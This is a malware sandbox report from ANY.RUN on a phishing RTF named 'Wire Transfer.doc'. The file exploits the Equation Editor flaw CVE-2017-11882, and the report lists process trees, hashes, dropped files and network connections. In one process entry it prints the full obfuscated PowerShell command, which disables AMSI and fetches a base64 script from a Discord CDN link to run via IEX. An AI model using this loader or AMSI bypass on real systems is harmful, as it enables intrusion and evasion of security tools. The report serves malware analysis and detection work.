File name:

Wire Transfer.doc

Full analysis: https://app.any.run/tasks/939c83d4-1757-45a2-9eb3-125f750e7327
Verdict: Malicious activity
Analysis date: January 24, 2022, 22:41:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

673A38847B61702DFFFE16F3EF663E6E

SHA1:

E5ACCBCE7AC7CDD8739270E9B392AC587B0DD1C7

SHA256:

2D11902F0163D96CE589DB1484C7A50AC7FB31195881B45D7135E64F6D5B8FBC

SSDEEP:

1536:u264J3fbgjEHezPzjbzOz2zgz1zjbzezmbz+zazKzgzuzmz/zxzEzzzezmbz+zab:08JQp8JHG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2736)
  • SUSPICIOUS

    • Checks supported languages

      • EQNEDT32.EXE (PID: 2736)
      • cscript.exe (PID: 2640)
      • CmD.exe (PID: 2496)
      • Powershell.exe (PID: 1272)
    • Reads the computer name

      • EQNEDT32.EXE (PID: 2736)
      • cscript.exe (PID: 2640)
      • Powershell.exe (PID: 1272)
    • Executed via COM

      • EQNEDT32.EXE (PID: 2736)
    • Executes scripts

      • CmD.exe (PID: 2496)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2736)
    • Executed via WMI

      • Powershell.exe (PID: 1272)
    • Reads Environment values

      • Powershell.exe (PID: 1272)
    • PowerShell script executed

      • Powershell.exe (PID: 1272)
  • INFO

    • Checks supported languages

      • WINWORD.EXE (PID: 3004)
    • Reads the computer name

      • WINWORD.EXE (PID: 3004)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3004)
    • Checks Windows Trust Settings

      • cscript.exe (PID: 2640)
      • Powershell.exe (PID: 1272)
    • Reads settings of System Certificates

      • Powershell.exe (PID: 1272)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
All screenshots are available in the full report
Total processes
47
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Processes in graph: winword.exe, eqnedt32.exe, cmd.exe, cscript.exe, powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 3004
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Wire Transfer.doc.rtf"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
PID: 2736
CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Parent process: svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
PID: 2496
CMD: CmD.exe /C cscript %tmp%\Client.vbs A C
Path: C:\Windows\system32\CmD.exe
Parent process: EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 2640
CMD: cscript C:\Users\admin\AppData\Local\Temp\Client.vbs A C
Path: C:\Windows\system32\cscript.exe
Parent process: CmD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1272Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$2703183199940741270318319994074127031831999407412703183199940741=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,
56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,51,50,55,48,51,49,56,51,49,57,57,57,52,48,55,52,49,47,57,51,50,55,48,51,51,53,52,54,50,57,53,50,57,54,49,48,47,104,105,116,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString
($2703183199940741270318319994074127031831999407412703183199940741)|I`E`X
Path: C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Parent process: wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Total events
8 393
Read events
7 590
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
3
Unknown types
6

Dropped files

PID
Process
Filename
Type
PID: 3004
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRE90B.tmp.cvr
Type:
MD5:
SHA256:

PID: 3004
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: CE122B43DC34F0399FBCA8E567EE9593
SHA256: 1B48569C8D636659775125BFE94FCD01E7C308AA6F3C3046449693E6EBB2A790

PID: 1272
Process: Powershell.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Type: der
MD5: 494A7483CEAF488A79CB45418E88ECCD
SHA256: 9A65904F97742B3D8844EFAFCE7D9E9DA7C1B96A8FDE541E718768AE68293D50

PID: 1272
Process: Powershell.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Type: binary
MD5: 5E9D892D37BBC20F7CF44052FCB3AA41
SHA256: 7EFEBF17C89B2289BBF3E8BD9AB35CDAAC896C2A5AD4982CC84A46BBAF0F0520

PID: 3004
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\Client.vbs
Type: text
MD5: 7D62B9B3DF8CDAF06DE881AD1860055D
SHA256: A313613D88053A4F6FAF988750597BA309DE2C2F34CD8709AF2AD059FC65D983

PID: 3004
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Wire Transfer.doc.rtf.LNK
Type: lnk
MD5: 96CE7D8EEEBBC4A9F73F568E56609F68
SHA256: 41B5135ADC95408A3C2DE71B3EC77E529820956FEBD8A68F8BE6FF4B6229909A

PID: 3004
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Type: ini
MD5: 2162A46B7EA6C1B7E2B09C82EAAB3B2D
SHA256: 41044CEA93FF833689EC75C5324B6308A2FF05A9E281AD22B1D381CC13959620

PID: 1272
Process: Powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Type: binary
MD5: D3C284009A5790C3AA90D7C5D620CA65
SHA256: 6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39

PID: 3004
Process: WINWORD.EXE
Filename: C:\Users\admin\Desktop\~$re Transfer.doc.rtf
Type: pgc
MD5: 4A6E0F4C8554F831FADC33D70743A855
SHA256: 4F4A1BCF31B2172F1078E3FDA26AF6AC4D0AB301CFC8205B79A804432B38B3E2

PID: 1272
Process: Powershell.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Type: binary
MD5: EBF8534A419964083D677BE1752E698F
SHA256: 0A71C911903867C9B10B15FFC233EC332C4AA857D6E6190C0583B24B23B78D8E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1272
Powershell.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
US
der
1.47 Kb
whitelisted
1272
Powershell.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6d268db0aaec37f7
US
compressed
4.70 Kb
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1272
Powershell.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1272
Powershell.exe
162.159.135.233:443
cdn.discordapp.com
Cloudflare Inc
shared
1272
Powershell.exe
93.184.221.240:80
ctldl.windowsupdate.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1272
Powershell.exe
162.159.129.233:443
cdn.discordapp.com
Cloudflare Inc
shared

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.174
whitelisted
cdn.discordapp.com
  • 162.159.129.233
  • 162.159.135.233
  • 162.159.130.233
  • 162.159.134.233
  • 162.159.133.233
shared
ctldl.windowsupdate.com
  • 93.184.221.240
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

No threats detected
No debug info